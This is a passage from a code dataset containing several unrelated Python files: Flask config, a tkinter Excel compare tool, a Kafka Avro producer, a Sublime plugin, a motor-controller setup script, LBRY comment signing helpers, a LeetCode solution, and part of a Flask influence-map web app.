True\n\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' # in-memory database\n\n\nclass ProductionConfig(BaseConfig):\n DEBUG = False\n\n\nconfig = {\n 'development': DevelopmentConfig,\n 'testing': TestingConfig,\n 'production': ProductionConfig,\n 'default': ProductionConfig\n}\n","sub_path":"main/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"433227347","text":"import pandas as pd\r\nimport tkinter as tk\r\nfrom tkinter.ttk import Combobox\r\nfrom tkinter import filedialog\r\n\r\nroot = tk.Tk()\r\n\r\n#Changes the window size\r\nroot.geometry(\"400x400+120+120\")\r\n\r\n# Reads the excel file so you can work with it in python\r\n#Will replace this with buttons to export your chosen file\r\n\r\n#Home\r\ndf1 = pd.read_excel(r'C:\\Users\\Rislynn\\Documents\\Python Pandas Excels\\VizData.xlsx')\r\ndf2 = pd.read_excel(r'C:\\Users\\Rislynn\\Documents\\Python Pandas Excels\\CustomerData.xlsx')\r\n\r\n#work\r\n#df1 = pd.read_excel(r'C:\\Users\\Tonya.Reeves\\Documents\\Python\\ExcelComparev1\\VizData.xlsx')\r\n#df2 = pd.read_excel(r'C:\\Users\\Tonya.Reeves\\Documents\\Python\\ExcelComparev1\\CustomerData.xlsx')\r\n\r\n#Below to for potential use\r\n#df1 = pd.DataFrame()\r\n#df2 = pd.DataFrame()\r\n\r\n# Returns the list of columns\r\ndf1columns = df1.columns\r\ndf2columns = df2.columns\r\n\r\n#Initializes a list of the columns to be used in the combo box\r\ndf1column_list = []\r\ndf2column_list = []\r\n\r\ndef column_list_creator(dfxcolumns,dfxcol_list):\r\n#Creates a list out of the data frame columns\r\n #dfxcolumns are the columns of the data frame\r\n #dfxcol_list is the list you would like the columns inserted into\r\n for i in range(len(dfxcolumns)):\r\n dfxcol_list.append(dfxcolumns[i])\r\n return dfxcol_list\r\n\r\ndf1column_list = column_list_creator(df1columns,df1column_list)\r\ndf2column_list = column_list_creator(df2columns,df2column_list)\r\n\r\n#Will be used for letting the user import the excel\r\n#currently doesn't work as intended\r\ndef getexcel1():\r\n #global df\r\n import_file_path = filedialog.askopenfilename()\r\n df1 = pd.read_excel(import_file_path)\r\n\r\n\r\ndef getexcel2():\r\n #global df2\r\n import_file_path = filedialog.askopenfilename()\r\n df2 = pd.read_excel(import_file_path)\r\n return df2 #print(df2)\r\n\r\n\r\n#End user will add values to this list using the drop down\r\ndf1columns_keep = []\r\ndf2columns_keep = []\r\n# this list must be in the order you want in the resulting excel.\r\n# First set of columns will be the predicate columns and after that must be ordered to match df2\r\n\r\ndef clear_listbox(lb_dfxcols_keep):\r\n #Deletes all entries of the list box\r\n lb_dfxcols_keep.delete(0, \"end\")\r\n\r\ndef update_listbox(dfxcolumns_keep,lb_dfxcols_keep):\r\n #populates the listbox\r\n for cols in dfxcolumns_keep:\r\n lb_dfxcols_keep.insert(\"end\", cols)\r\n\r\ndef add_col(combodfx,dfxcolumns_keep,lb_dfxcols_keep):\r\n #Adds the selected value from the drop down to our list\r\n x = combodfx.get() #Gets the currently selected value from the combo (drop) box\r\n if x != 'select':\r\n dfxcolumns_keep.append(x) #adds the value of the drop box to the list of columns\r\n #Refreshes the list box to reflect the changes\r\n clear_listbox(lb_dfxcols_keep)\r\n update_listbox(dfxcolumns_keep, lb_dfxcols_keep)\r\n\r\ndef del_col(combodfx,dfxcolumns_keep,lb_dfxcols_keep):\r\n x = combodfx.get()\r\n if x != 'select':\r\n 
dfxcolumns_keep.remove(x)\r\n #Refreshes the list box to reflect the changes\r\n clear_listbox(lb_dfxcols_keep)\r\n update_listbox(dfxcolumns_keep, lb_dfxcols_keep)\r\n\r\ndef move_down(combodfx,dfxcolumns_keep,lb_dfxcols_keep):\r\n x = combodfx.get()\r\n if x != 'select':\r\n oldindex = dfxcolumns_keep.index(x)\r\n newindex = oldindex + 1\r\n dfxcolumns_keep.remove(x)\r\n dfxcolumns_keep.insert(newindex, x)\r\n #Refreshes the list box to reflect the changes\r\n clear_listbox(lb_dfxcols_keep)\r\n update_listbox(dfxcolumns_keep, lb_dfxcols_keep)\r\n\r\ndef move_up(combodfx,dfxcolumns_keep,lb_dfxcols_keep):\r\n x = combodfx.get()\r\n if x != 'select':\r\n oldindex = dfxcolumns_keep.index(x)\r\n newindex = oldindex - 1\r\n #Deletes the current entry\r\n dfxcolumns_keep.remove(x)\r\n #Adds the entry into the list at the desired location\r\n dfxcolumns_keep.insert(newindex, x)\r\n #Refreshes the list box to reflect the changes\r\n clear_listbox(lb_dfxcols_keep)\r\n update_listbox(dfxcolumns_keep, lb_dfxcols_keep)\r\n\r\n#Need a function to take the columns you're keeping and create a dataframe\r\n#Then merge the resulting data frames\r\n#And create variance columns\r\n#Lastly save the excel\r\n\r\n#doesn't work yet\r\ndef update_combo_list():\r\n list = column_list_creator(df1columns,df1column_list)\r\n combodf1['values']= list\r\n\r\n#Following 3 lines create the combo box aka drop down list\r\n#Left\r\n#combodf1 = Combobox(root, values=df1column_list, width=15)\r\ncombodf1 = Combobox(root, postcommand = update_combo_list, width=15)\r\ncombodf1.set(\"select\")\r\ncombodf1.grid(row=2, column=0)\r\n\r\n\r\n\r\n#Right\r\ncombodf2 = Combobox(root, values=df2column_list, width=15)\r\ncombodf2.set(\"select\")\r\ncombodf2.grid(row=2, column=1)\r\n\r\n#Creates the listboxes\r\n#Left\r\nlb_df1cols_keep = tk.Listbox(root)\r\nlb_df1cols_keep.grid(row=8, column=0)\r\n\r\n#Right\r\nlb_df2cols_keep = tk.Listbox(root)\r\nlb_df2cols_keep.grid(row=8, column=1)\r\n\r\n# Functions for the buttons, they can't have arguments so need to use lambdas or wrappers\r\ndef add_col1():\r\n return add_col(combodf1, df1columns_keep, lb_df1cols_keep)\r\ndef del_col1():\r\n return del_col(combodf1, df1columns_keep, lb_df1cols_keep)\r\ndef move_down1():\r\n return move_down(combodf1, df1columns_keep, lb_df1cols_keep)\r\ndef move_up1():\r\n return move_up(combodf1, df1columns_keep, lb_df1cols_keep)\r\n\r\n#Wrappers for df2\r\ndef add_col2():\r\n return add_col(combodf2, df2columns_keep, lb_df2cols_keep)\r\ndef del_col2():\r\n return del_col(combodf2, df2columns_keep, lb_df2cols_keep)\r\ndef move_down2():\r\n return move_down(combodf2, df2columns_keep, lb_df2cols_keep)\r\ndef move_up2():\r\n return move_up(combodf2, df2columns_keep, lb_df2cols_keep)\r\n\r\n#Buttons\r\n#Import Buttons\r\nimport_btn_1 = tk.Button(root, text=\"Import Excel 1\", command=getexcel1).grid(row=0, column=0)\r\nimport_btn_2 = tk.Button(root, text=\"Import Excel 2\", command=getexcel2).grid(row=0, column=1)\r\n\r\n#Left Buttons\r\nleft_add = tk.Button(root, text=\"Add\", command=add_col1).grid(row=4, column=0)\r\nleft_del = tk.Button(root, text=\"Delete\", command=del_col1).grid(row=5, column=0)\r\nleft_up = tk.Button(root, text=\"Dwn\", command=move_down1).grid(row=7, column=0)\r\nleft_dwn = tk.Button(root, text=\"Up\", command=move_up1).grid(row=6, column=0)\r\n\r\n#Right Buttons\r\nright_add = tk.Button(root, text=\"Add\", command=add_col2).grid(row=4, column=1)\r\nright_del = tk.Button(root, text=\"Delete\", command=del_col2).grid(row=5, 
column=1)\r\nright_up = tk.Button(root, text=\"Dwn\", command=move_down2).grid(row=7, column=1)\r\nright_dwn = tk.Button(root, text=\"Up\", command=move_up2).grid(row=6, column=1)\r\n\r\n#Adds the text for Number Key Columns\r\nlbl_title = tk.Label(root, text=\"Enter the number of key columns\")\r\nlbl_title.grid(row=9, column=0)\r\n\r\n#Adds free entry field for number of key columns\r\ntxt_input = tk.Entry(root, width=15)\r\ntxt_input.grid(row=9, column=1)\r\n\r\n#Button for Merging\r\nmerge_btn = tk.Button(root, text=\"Merge\", command=move_up2).grid(row=10, column=1)\r\n\r\nroot.mainloop()\r\n\r\n#Need to not let the user add the same column twice\r\n#Columns to keep list size must be the same for both data frames\r\n\r\n#Error handling for move up/down/delete if the items doesn't exist","sub_path":"ExcelComparev3.py","file_name":"ExcelComparev3.py","file_ext":"py","file_size_in_byte":7204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"263551128","text":"\"\"\"\nfilename: confluent_kafka.py\nname: confluent_kafka\n\ndescription:\nworking with kafka confluent. reading data from read files class and sending to\nkafka using schema registry option. also using some producer settings\n\"\"\"\n\n# import libraries\nfrom libs import read_files\nfrom confluent_kafka import avro\nfrom confluent_kafka.avro import AvroProducer\nfrom configs import config\nfrom random import seed\n\n# incremental seed of 1\nseed(1)\n\n\nclass Kafka(object):\n\n # use __slots__ to explicitly declare all schema members\n __slots__ = [\"review_id\", \"business_id\", \"user_id\", \"stars\", \"useful\", \"date\"]\n\n # define init function based on the expected input\n def __init__(self, review_id=None, business_id=None, user_id=None, stars=None, useful=None, date=None):\n\n self.review_id = review_id\n self.business_id = business_id\n self.user_id = user_id\n self.stars = stars\n self.useful = useful\n self.date = date\n\n # avro does not support code generation\n # need to provide dict representation\n def to_dict(self):\n\n return {\n \"review_id\": self.review_id,\n \"business_id\": self.business_id,\n \"user_id\": self.user_id,\n \"stars\": self.stars,\n \"useful\": self.useful,\n \"date\": self.date\n }\n\n # delivery reports for producer.poll\n # callback with extra argument\n def on_delivery(self, err, msg, obj):\n\n if err is not None:\n print('message delivery failed for user {} with error {}'.format(obj.name, err))\n else:\n print('message successfully produced to {} [{}] at offset {}'.format(msg.topic(), msg.partition(), msg.offset()))\n\n def avro_producer(self, broker, schema_registry, topic, gen_dt_rows):\n\n # avro schema [key] & [value]\n key_schema_str = config.key_schema_str\n value_schema_str = config.value_schema_str\n\n # load avro definition\n key_schema = avro.loads(key_schema_str)\n value_schema = avro.loads(value_schema_str)\n\n # get data to insert\n get_data = read_files.CSV().csv_reader(gen_dt_rows)\n\n # init producer using key & value schema\n producer = AvroProducer(\n {\n # client id\n \"client.id\": 'sr-py-yelp-stream-app',\n # kafka broker server\n \"bootstrap.servers\": broker,\n # schema registry url\n \"schema.registry.url\": schema_registry,\n # eos = exactly once semantics [options]\n \"enable.idempotence\": \"true\",\n \"max.in.flight.requests.per.connection\": 1,\n \"retries\": 100,\n \"acks\": \"all\",\n # max number of messages batched in one message set\n \"batch.num.messages\": 1000,\n # delay in ms to wait for 
messages in queue\n \"queue.buffering.max.ms\": 100,\n # max number of messages on queue\n \"queue.buffering.max.messages\": 1000,\n # wait messages in queue before send to brokers (batch)\n \"linger.ms\": 100\n },\n default_key_schema=key_schema,\n default_value_schema=value_schema)\n\n # loop to insert data\n inserts = 0\n while inserts < len(get_data):\n\n # instantiate new records, execute callbacks\n record = Kafka()\n\n try:\n\n # map columns and access using dict values\n record.review_id = get_data[inserts]['review_id']\n record.business_id = get_data[inserts]['business_id']\n record.user_id = get_data[inserts]['user_id']\n record.stars = get_data[inserts]['stars']\n record.useful = get_data[inserts]['useful']\n record.date = get_data[inserts]['date']\n\n # print(record.to_dict())\n\n # server on_delivery callbacks from previous asynchronous produce()\n producer.poll(0)\n\n # message passed to the delivery callback will already be serialized.\n # to aid in debugging we provide the original object to the delivery callback.\n producer.produce(\n topic=topic,\n key={'review_id': record.review_id},\n value=record.to_dict(),\n callback=lambda err, msg, obj=record: self.on_delivery(err, msg, obj)\n )\n\n except BufferError:\n print(\"buffer full\")\n producer.poll(0.1)\n\n except ValueError:\n print(\"invalid input\")\n raise\n\n except KeyboardInterrupt:\n raise\n\n # increment values\n inserts += 1\n\n print(\"flushing records...\")\n\n # buffer messages to send\n producer.flush()\n","sub_path":"producer/reviews/libs/sr_confluent_kafka.py","file_name":"sr_confluent_kafka.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"178342280","text":"import sublime, sublime_plugin\nfrom .utils import *\nfrom .CleverDelete import clean_up_right, clean_up_left\n\n\ndef test():\n\tx = a + b * c-1\n\tx += a * b * [plop(c + d) + 1, c(), p]\n\tx = -5 - 4.0 + .9\n\tself.view.sel().clear((a * b), m)\n\t# a = self . view .9\n\t# c++\n\t# x = -5 - 4.0e5\n\t# int x = p->test();\n\t# int x = 5*p;\n\n\nclass CleverMoveCommand(sublime_plugin.TextCommand):\n\n\tdef run(self, edit, type, direction):\n\t\tforward = direction == \"forward\"\n\n\t\tregions = list(self.view.sel())\n\n\t\tself.view.sel().clear()\n\n\t\tfor region in reversed(regions):\n\t\t\tbegin, end = region.begin(), region.end()\n\n\t\t\tif forward:\n\t\t\t\tend = max(find_piece_end(self.view, begin, end, forward), end + 1)\n\t\t\t\t# end = clean_up_right(self.view, begin, end)\n\t\t\t\tregion = sublime.Region(end, end)\n\t\t\telse:\n\t\t\t\tbegin = min(find_piece_end(self.view, begin, end, forward), begin - 1)\n\t\t\t\t# begin = clean_up_left(self.view, begin, end)\n\t\t\t\tregion = sublime.Region(begin, begin)\n\n\n\t\t\tself.view.sel().add(region)\n\t\t\tself.view.show(region)\n\n\n","sub_path":"CleverMove.py","file_name":"CleverMove.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"4496271","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#### - - coding: latin-1 -*-\n\n# import dependency libraries ..................................................\n\nimport sys, traceback\nfrom fractions import Fraction\n\nfrom lib.enums import Orientation\nfrom lib.logger import Logger, Level\n\n# ..............................................................................\nclass MotorConfigurer():\n '''\n Configures the Thunderborg motor controller. 
\n '''\n def __init__(self, ros, config, level):\n self._log = Logger(\"mtrconf\", level)\n if config is None:\n raise ValueError('null configuration argument.')\n self._config = config\n\n # ..........................................................................\n def configure(self):\n '''\n Import the ThunderBorg library, then configure and return the Motors.\n '''\n self._log.info('configure thunderborg & motors...')\n try:\n self._log.info('importing ThunderBorg...')\n import lib.ThunderBorg3 as ThunderBorg\n self._log.info('successfully imported ThunderBorg.')\n TB = ThunderBorg.ThunderBorg(Level.INFO) # create a new ThunderBorg object\n TB.Init() # set the board up (checks the board is connected)\n self._log.info('successfully instantiated ThunderBorg.')\n\n if not TB.foundChip:\n boards = ThunderBorg.ScanForThunderBorg()\n if len(boards) == 0:\n self._log.error('No ThunderBorg found, check you are attached :)')\n else:\n self._log.error('No ThunderBorg at address %02X, but we did find boards:' % (TB.i2cAddress))\n for board in boards:\n self._log.info(' %02X (%d)' % (board, board))\n self._log.error('If you need to change the I²C address change the setup line so it is correct, e.g. TB.i2cAddress = 0x{}'.format(boards[0]))\n sys.exit(1)\n TB.SetLedShowBattery(True)\n \n # initialise ThunderBorg ...........................\n self._log.debug('getting battery reading...')\n # get battery voltage to determine max motor power\n # could be: Makita 12V or 18V power tool battery, or 12V line supply\n voltage_in = TB.GetBatteryReading()\n if voltage_in is None:\n raise OSError('cannot continue: cannot read battery voltage.')\n self._log.info('voltage in: {:>5.2f}V'.format(voltage_in))\n # voltage_in = 20.5\n # maximum motor voltage\n voltage_out = 9.0\n self._log.info('voltage out: {:>5.2f}V'.format(voltage_out))\n if voltage_in < voltage_out:\n raise OSError('cannot continue: battery voltage too low ({:>5.2f}V).'.format(voltage_in))\n # Setup the power limits\n if voltage_out > voltage_in:\n _max_power_ratio = 1.0\n else:\n _max_power_ratio = voltage_out / float(voltage_in)\n # convert float to ratio format\n self._log.info('battery level: {:>5.2f}V; motor voltage: {:>5.2f}V; maximum power ratio: {}'.format(voltage_in, voltage_out, \\\n str(Fraction(_max_power_ratio).limit_denominator(max_denominator=20)).replace('/',':')))\n\n except Exception as e:\n self._log.error('unable to import ThunderBorg: {}'.format(e))\n traceback.print_exc(file=sys.stdout)\n sys.exit(1)\n\n # now import motors\n from lib.motors import Motors\n try:\n self._log.info('getting raspberry pi...')\n self._log.info('configuring motors...')\n self._motors = Motors(self._config, TB, Level.INFO)\n self._motors.get_motor(Orientation.PORT).set_max_power_ratio(_max_power_ratio)\n self._motors.get_motor(Orientation.STBD).set_max_power_ratio(_max_power_ratio)\n return self._motors\n except OSError as oe:\n self._log.error('failed to configure motors: {}'.format(oe))\n# sys.stderr = DevNull()\n sys.exit(1)\n\n \n#EOF\n","sub_path":"lib/motor_configurer.py","file_name":"motor_configurer.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"110990853","text":"import argparse\nimport webbrowser\n\n__version__ = \"0.1.0\"\n\nCHROME_PATH = r\"C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s\"\n\n\ndef get_parser():\n \"\"\"\n 解析命令行参数\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Open url with your 
browser.\")\n parser.add_argument(\n \"url\",\n metavar=\"URL\",\n type=str,\n help=\"the url you want to open with browser\",\n )\n parser.add_argument(\n \"-v\",\n \"--version\",\n action=\"store_true\",\n help=\"displays the current version of `open`\",\n )\n return parser\n\n\ndef command_line_runner():\n \"\"\"\n 执行命令行操作\n \"\"\"\n parser = get_parser()\n args = vars(parser.parse_args())\n\n if args[\"version\"]:\n print(__version__)\n return\n\n if not args[\"url\"]:\n parser.print_help()\n return\n\n webbrowser.get(CHROME_PATH).open(args[\"url\"])\n\n\nif __name__ == \"__main__\":\n command_line_runner()\n","sub_path":"open_browser.py","file_name":"open_browser.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"503307397","text":"import logging\nimport time\nimport hashlib\nimport binascii\n\nimport ecdsa\nfrom lbry import utils\nfrom lbry.crypto.hash import sha256\nfrom lbry.wallet.transaction import Output\n\nlog = logging.getLogger(__name__)\n\n\ndef get_encoded_signature(signature):\n signature = signature.encode() if isinstance(signature, str) else signature\n r = int(signature[:int(len(signature) / 2)], 16)\n s = int(signature[int(len(signature) / 2):], 16)\n return ecdsa.util.sigencode_der(r, s, len(signature) * 4)\n\n\ndef cid2hash(claim_id: str) -> bytes:\n return binascii.unhexlify(claim_id.encode())[::-1]\n\n\ndef is_comment_signed_by_channel(comment: dict, channel: Output, abandon=False):\n if isinstance(channel, Output):\n try:\n signing_field = comment['comment_id'] if abandon else comment['comment']\n pieces = [\n comment['signing_ts'].encode(),\n cid2hash(comment['channel_id']),\n signing_field.encode()\n ]\n return Output.is_signature_valid(\n get_encoded_signature(comment['signature']),\n sha256(b''.join(pieces)),\n channel.claim.channel.public_key_bytes\n )\n except KeyError:\n pass\n return False\n\n\ndef sign_comment(comment: dict, channel: Output, abandon=False):\n timestamp = str(int(time.time()))\n signing_field = comment['comment_id'] if abandon else comment['comment']\n pieces = [timestamp.encode(), channel.claim_hash, signing_field.encode()]\n digest = sha256(b''.join(pieces))\n signature = channel.private_key.sign_digest_deterministic(digest, hashfunc=hashlib.sha256)\n comment.update({\n 'signature': binascii.hexlify(signature).decode(),\n 'signing_ts': timestamp\n })\n\n\nasync def jsonrpc_post(url: str, method: str, params: dict = None, **kwargs) -> any:\n params = params or {}\n params.update(kwargs)\n json_body = {'jsonrpc': '2.0', 'id': None, 'method': method, 'params': params}\n async with utils.aiohttp_request('POST', url, json=json_body) as response:\n try:\n result = await response.json()\n return result['result'] if 'result' in result else result\n except Exception as cte:\n log.exception('Unable to decode response from server: %s', cte)\n return await response.text()\n","sub_path":"lbry/extras/daemon/comment_client.py","file_name":"comment_client.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"205674608","text":"class Solution:\n # @param {character[][]} matrix\n # @return {integer}\n def maximalRectangle(self, matrix):\n ## reference: http://www.cnblogs.com/easonliu/p/3657489.html\n if len(matrix) < 1:\n return 0;\n n = len(matrix);\n if n == 0:\n return 0;\n m = len(matrix[0]);\n if m == 0:\n return 0;\n lines = [[0 for i in range(m)] for j in 
range(n)]\n\n for i in range(n):\n for j in range(m):\n if i == 0:\n lines[i][j] = 1 if matrix[i][j] == '1' else 0;\n else:\n lines[i][j] += lines[i-1][j] + 1 if matrix[i][j] == '1' else 0;\n\n maxRec = 0;\n for i in range(n):\n temRec = self.maxArea(lines[i]);\n maxRec = max(maxRec, temRec);\n\n return maxRec;\n def maxArea(self, line):\n maxArea = 0;\n line.append(0);\n i = 0;\n stack = [];\n while i < len(line):\n if stack == [] or line[stack[-1]] <= line[i]:\n stack.append(i);\n i += 1;\n else:\n t = stack.pop();\n maxArea = max(maxArea, line[t] * (i if stack == [] else i - stack[-1] - 1));\n\n return maxArea;\n\nif __name__ == '__main__':\n obj = Solution();\n print(obj.maximalRectangle([['1','1'], ['1', '1']]))","sub_path":"All Code/No.85 Maximal Rectangle.py","file_name":"No.85 Maximal Rectangle.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"185458858","text":"import copy\nimport json\nimport math\nimport string\nfrom collections import Counter\n\nimport flask\nfrom flask import request\n\nimport core.utils.entity_type as ent\nfrom core.search.query_info import paper_info_db_check_multiquery\nfrom core.search.query_name import (\n affiliation_name_query, author_name_query, conference_name_query,\n fos_name_query, get_conf_journ_display_names, journal_name_query,\n paper_name_query)\nfrom core.search.query_paper import get_all_paper_ids\nfrom core.utils.get_stats import get_stats\nfrom core.utils.load_tsv import tsv_to_dict\nfrom webapp.graph import ReferenceFlower, compare_flowers\nfrom webapp.shortener import decode_filters, url_decode_info, url_encode_info\nfrom webapp.utils import *\n\nfrom webapp.front_end_helper import make_response_data\nfrom webapp.konigsberg_client import KonigsbergClient\n\nkb_client = KonigsbergClient('http://localhost:8081')\n\nflower_leaves = [ ('author', [ent.Entity_type.AUTH])\n , ('conf' , [ent.Entity_type.CONF, ent.Entity_type.JOUR])\n , ('inst' , [ent.Entity_type.AFFI])\n , ('fos' , [ent.Entity_type.FSTD]) ]\nid_helper_dict = {\n \"conference\": \"ConferenceSeriesId\",\n \"journal\": \"JournalId\",\n \"institution\": \"AffiliationId\",\n \"paper\": \"PaperId\",\n \"author\": \"AuthorId\",\n \"topic\": \"FieldOfStudyId\"\n}\n\nNUM_THREADS = 8\nNUM_NODE_INFO = 5\n\n\nblueprint = flask.Blueprint('views', __name__)\n\n\n@blueprint.route('/autocomplete')\ndef autocomplete():\n entity_type = request.args.get('option')\n data = loadList(entity_type)\n return flask.jsonify(data)\n\n\n@blueprint.route('/query')\ndef query():\n entity_type = \"paper\" # support paper search only\n entity_title = request.args.get('title')\n data = filter_papers(entity_title, query_entity([entity_type], entity_title))\n paper_ids = [p[0][id_helper_dict[entity_type]] for p in data]\n doc_id = url_encode_info(paper_ids=paper_ids, name=entity_title)\n url_base = f\"http://influencemap.ml/submit/?id={doc_id}\"\n res = {\n \"search_result\": data,\n \"paper_ids\": paper_ids,\n \"flower_url\": url_base\n }\n return flask.jsonify(res)\n\n\n@blueprint.route('/')\ndef main():\n return flask.render_template(\"main.html\")\n\n\n@blueprint.route('/browse')\ndef browse():\n browse_list = load_gallery()\n return flask.render_template(\n \"browse.html\",\n browse_groups=browse_list, cache_data=[])\n\n\n@blueprint.route('/create', methods=['GET', 'POST'])\ndef create():\n\n json_data = request.form.get('data')\n data = {} if json_data is None else json.loads(json_data)\n keyword = 
data.get('keyword', '')\n search = data.get('search') == 'true'\n option = data.get('option', '')\n\n # render page with data\n return flask.render_template(\n \"create.html\",\n navbarOption=get_navbar_option(keyword, option),\n search=search)\n\n\n\n@blueprint.route('/curate')\ndef curate():\n types = get_cache_types()\n data = json.loads(request.form.get('data'))\n keyword = data.get('keyword', '')\n search = data.get('search') == 'true'\n option = data.get('option')\n\n # render page with data\n return flask.render_template(\n \"curate.html\",\n navbarOption=get_navbar_option(keyword, option),\n search=search,\n types=types)\n\n\n@blueprint.route('/check_record')\ndef check_record():\n exists, names = check_browse_record_exists(request.form.get(\"type\"), request.form.get(\"name\"))\n return flask.jsonify({\"exists\": exists, \"names\": names})\n\n\n@blueprint.route('/crate_load_file')\ndef curate_load_file():\n filename = request.form.get(\"filename\")\n try:\n data = tsv_to_dict(filename)\n success = \"true\"\n except FileNotFoundError:\n data = {}\n success = \"false\"\n return flask.jsonify({'data': data, 'success': success})\n\n\n\ns = {\n 'author': ('
{DisplayName}<br>Papers: {PaperCount}, Citations: {CitationCount}<br>'),\n 'conference': ('{DisplayName}<br>Papers: {PaperCount}, Citations: {CitationCount}<br>'),\n 'institution': ('{DisplayName}<br>Papers: {PaperCount}, Citations: {CitationCount}<br>'),\n 'journal': ('{DisplayName}<br>Papers: {PaperCount}, Citations: {CitationCount}<br>'),\n 'paper': ('{OriginalTitle}<br>Citations: {CitationCount}<br>'),\n 'topic': ('{DisplayName} (Level {Level})<br>Papers: {PaperCount}, Citations: {CitationCount}<br>')\n}\n\n\n@blueprint.route('/search', methods=['POST'])\ndef search():\n request_data = json.loads(request.form.get(\"data\"))\n keyword = request_data.get(\"keyword\")\n entityType = request_data.get(\"option\")\n exclude = set(string.punctuation)\n keyword = ''.join(ch for ch in keyword if ch not in exclude)\n keyword = keyword.lower()\n keyword = \" \".join(keyword.split())\n\n print(entityType, keyword)\n data = query_entity(entityType, keyword)\n for i in range(len(data)):\n entity = {'data': data[i][0]}\n entity['display-info'] = s[data[i][1]].format(**entity['data'])\n if \"Affiliation\" in entity['data']: entity['display-info'] = entity['display-info'][0:-4] + \", Institution: {}<br>\".format(entity['data'][\"Affiliation\"])\n if \"Authors\" in entity['data']: entity['display-info'] += (\"<br>Authors: {}<br>
    \".format(\", \".join(entity['data'][\"Authors\"]))\n entity['table-id'] = \"{}_{}\".format(data[i][1], entity['data'][id_helper_dict[data[i][1]]])\n data[i] = entity\n return flask.jsonify({'entities': data})\n\n\n\n@blueprint.route('/manualcache', methods=['POST'])\ndef manualcache():\n cache_dictionary = (json.loads(request.form.get('cache')))\n paper_action = request.form.get('paperAction')\n #saveNewBrowseCache(cache_dictionary)\n\n if paper_action == \"batch\":\n paper_ids = get_all_paper_ids(cache_dictionary[\"EntityIds\"])\n addToBatch(paper_ids)\n if paper_action == \"cache\":\n paper_ids = get_all_paper_ids(cache_dictionary[\"EntityIds\"])\n paper_info_db_check_multiquery(paper_ids)\n return flask.jsonify({})\n\n\n@blueprint.route('/submit/', methods=['GET', 'POST'])\ndef submit():\n pub_years = None\n cit_years = None\n self_citations = False\n coauthors = True\n if request.method == \"GET\":\n doc_id = request.args[\"id\"]\n ids, flower_name, curated_flag = url_decode_info(doc_id)\n author_ids = ids.author_ids\n affiliation_ids = ids.affiliation_ids\n conference_ids = ids.conference_series_ids\n fos_ids = ids.field_of_study_ids\n journal_ids = ids.journal_ids\n paper_ids = ids.paper_ids\n\n encoded_filters = request.args.get(\"filters\")\n if encoded_filters is not None:\n decoded_filters = decode_filters(encoded_filters)\n pub_years = decoded_filters.pub_years\n cit_years = decoded_filters.cit_years\n self_citations = decoded_filters.self_citations\n coauthors = decoded_filters.coauthors\n else:\n curated_flag = False\n data_str = request.form['data']\n data = json.loads(data_str)\n entities = data['entities']\n author_ids = list(map(int, entities['AuthorIds']))\n affiliation_ids = list(map(int, entities['AffiliationIds']))\n conference_ids = list(map(int, entities['ConferenceIds']))\n journal_ids = list(map(int, entities['JournalIds']))\n paper_ids = list(map(int, entities['PaperIds']))\n fos_ids = list(map(int, entities['FieldOfStudyIds']))\n\n flower_name = data.get('flower_name')\n doc_id = url_encode_info(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_series_ids=conference_ids, field_of_study_ids=fos_ids,\n journal_ids=journal_ids, paper_ids=paper_ids, name=flower_name)\n\n if not flower_name:\n first_nonempty_id_list = (author_ids or affiliation_ids\n or conference_ids or journal_ids\n or paper_ids or fos_ids)\n if not first_nonempty_id_list:\n raise ValueError('no entities')\n name_lookup_f = {\n id(author_ids): author_name_query,\n id(affiliation_ids): affiliation_name_query,\n id(conference_ids): conference_name_query,\n id(journal_ids): journal_name_query,\n id(paper_ids): paper_name_query,\n id(fos_ids): fos_name_query}[id(first_nonempty_id_list)]\n flower_name = name_lookup_f([first_nonempty_id_list[0]])[0]\n total_entities = (len(author_ids) + len(affiliation_ids)\n + len(conference_ids) + len(journal_ids)\n + len(paper_ids) + len(fos_ids))\n if total_entities > 1:\n flower_name += f\" +{total_entities - 1} more\"\n\n flower = kb_client.get_flower(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_series_ids=conference_ids, field_of_study_ids=fos_ids,\n journal_ids=journal_ids, paper_ids=paper_ids, pub_years=pub_years,\n cit_years=cit_years, coauthors=coauthors,\n self_citations=self_citations)\n\n stats = kb_client.get_stats(\n author_ids=author_ids, affiliation_ids=affiliation_ids,\n conference_series_ids=conference_ids, field_of_study_ids=fos_ids,\n journal_ids=journal_ids, paper_ids=paper_ids)\n\n url_base = 
